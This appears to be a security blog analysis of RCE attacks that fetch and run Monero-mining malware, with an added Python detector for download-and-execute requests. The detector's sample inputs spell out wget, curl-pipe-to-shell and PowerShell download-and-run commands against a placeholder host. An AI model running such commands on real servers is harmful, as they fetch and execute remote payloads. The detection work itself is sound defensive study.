Recipe for an RCE crypto-mining attack

RCE attack

RCE attacks exploit vulnerabilities in the source code of web applications, specifically those that allow remote code execution, and then download and run crypto-mining malware on the affected servers.

RCE vulnerabilities are among the most dangerous classes of vulnerability, as they allow attackers to execute arbitrary code on a vulnerable server. A recent research project found a sharp increase in RCE attacks.

RCE vulnerabilities and payload families

The following are RCE attacks in which the payload attempted to send a request to an external source. The methods for sending these requests vary depending on the operating system and the desired result. For example, attackers targeting Windows servers used a PowerShell command to download a file from an external source (Figure 1). Attackers targeting Linux servers used bash scripts with wget or curl commands for the same purpose.

The payloads of RCE attacks can be divided into three categories:

  • Crypto-Mining Malware: This payload attempts to download a script from a remote server and execute it locally on the vulnerable machine. The script makes the server mine cryptocurrency, usually Monero. We discuss this type of attack in more detail below.
  • DDoS Botnet: Like the crypto-miner payload, this payload also attempts to download and run a script. The difference is that this script enrolls the vulnerable server in a DDoS botnet, so that it takes part in DDoS attacks on the attackers' command.
  • Exploration: This payload is used when an attacker is trying to find out whether a server is vulnerable at all. In attacks with this type of payload, many requests are sent to a single server, each targeting a different parameter.

The following attack was found in the POST body of an HTTP request that tried to exploit an RCE vulnerability to issue a wget command that downloads and executes a script. Here you can see how the attacker tries to cover his tracks with the option “-q”, which stands for “quiet mode”.

The link is disguised as a JPEG image, but it actually contains a bash script that infects the vulnerable server with crypto-mining malware.
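As an added example (not code from the original post), here is a small Python checker for the two signs described above: a request body that downloads a file and then runs it, and a fetched file whose URL claims to be a JPEG but whose bytes carry no image header. The sample request bodies and the example.invalid host are constructed.

```python
import re

# Indicators drawn from the behaviour described in the post: a download tool, a
# quiet/silent flag, a URL that claims to be an image, and a step that runs the result.
DOWNLOAD_TOOL = re.compile(r"\b(wget|curl|DownloadFile|Invoke-WebRequest)\b", re.I)
QUIET_FLAG = re.compile(r"\b(wget|curl)\b[^;|&]*\s-(q|s|sS)\b")
IMAGE_URL = re.compile(r"https?://[^\s'\"]+\.(?:jpe?g|png|gif)\b", re.I)
EXEC_STEP = re.compile(
    r"\|\s*(?:ba)?sh\b|[;&]\s*(?:ba)?sh\s+\S|\bchmod\s+\+x\b"
    r"|\b(?:Start-Process|IEX|Invoke-Expression)\b", re.I)
# Magic bytes of the image formats a disguised link might claim to serve.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
IMAGE_EXTENSIONS = ("jpg", "jpeg", "png", "gif")


def request_indicators(body: str) -> list[str]:
    """Names of the download-and-execute indicators present in an HTTP request body."""
    checks = [("download_tool", DOWNLOAD_TOOL), ("quiet_flag", QUIET_FLAG),
              ("image_url", IMAGE_URL), ("execute_step", EXEC_STEP)]
    return [name for name, rx in checks if rx.search(body)]


def is_suspicious_request(body: str) -> bool:
    """Flag only bodies that both fetch something and run it; a lone download is not enough."""
    found = request_indicators(body)
    return "download_tool" in found and "execute_step" in found


def content_mismatch(url: str, data: bytes) -> bool:
    """True when the URL extension claims an image but the bytes carry no image header."""
    ext = url.split("?", 1)[0].rsplit(".", 1)[-1].lower()
    if ext not in IMAGE_EXTENSIONS:
        return False
    return not data.startswith(IMAGE_MAGIC)


# Constructed sample request bodies, not taken from the original post.
SAMPLE_BODIES = [
    "cmd=wget -q http://example.invalid/img/logo.jpg -O /tmp/x.sh; bash /tmp/x.sh",
    "cmd=curl -s http://example.invalid/a.jpg | sh",
    "cmd=powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.jpg','p.exe'); Start-Process p.exe",
    "q=hello world",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_suspicious_request(body), request_indicators(body), body[:60])
    # A "JPEG" whose first bytes are a shebang is a script in disguise.
    print(content_mismatch("http://example.invalid/img/logo.jpg", b"#!/bin/bash\necho hi\n"))
```

The same `content_mismatch` check can be applied to files written to disk by a web worker, where an image extension with a shebang inside is a strong sign of the disguised script described above.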

This downloaded script has three phases:

  • Stop background processes
  • Achieve persistence
  • Download and run the malware

First, the script terminates processes running in the background on the server. These are mainly competing crypto-miners, but also security mechanisms and other CPU-intensive processes.

The script identifies competing crypto-miners by terminating processes that belong to known crypto-mining software, or whose command lines contain specific IP addresses or fragments of crypto-wallet addresses. Apparently the attacker knows exactly who his competitors are, since he kills processes associated with specific IPs and wallets, and he clearly does not like competition.

In the second phase, the script deletes the existing cron jobs on the system. A cron job is a task scheduled to run automatically on Linux.

In the third and final phase, the system is finally infected. First, the script downloads a dynamic configuration file. In the attacks we observed, the configuration file came from the same host the script itself was downloaded from.

Next, the malware itself is downloaded. The script then determines the number of CPU cores in the server and runs the malware with the configuration file and the core count as input parameters.

To increase the chances of success, the script then repeats the third phase four more times, each time downloading a different configuration file and malicious program. Each further program is only run if the previous attempts failed.

If the script succeeds, the vulnerable server it ran on is infected with malware that mines cryptocurrency for the attacker.

The trail of money

The downloaded configuration files we found contained active Monero wallets belonging to the attackers. We tracked the wallets and mining pools to see how much money can be made with crypto-mining.

At the time of writing, the attacker had earned about 41 Monero, which (at the current Monero/dollar rate) is about $10,000.
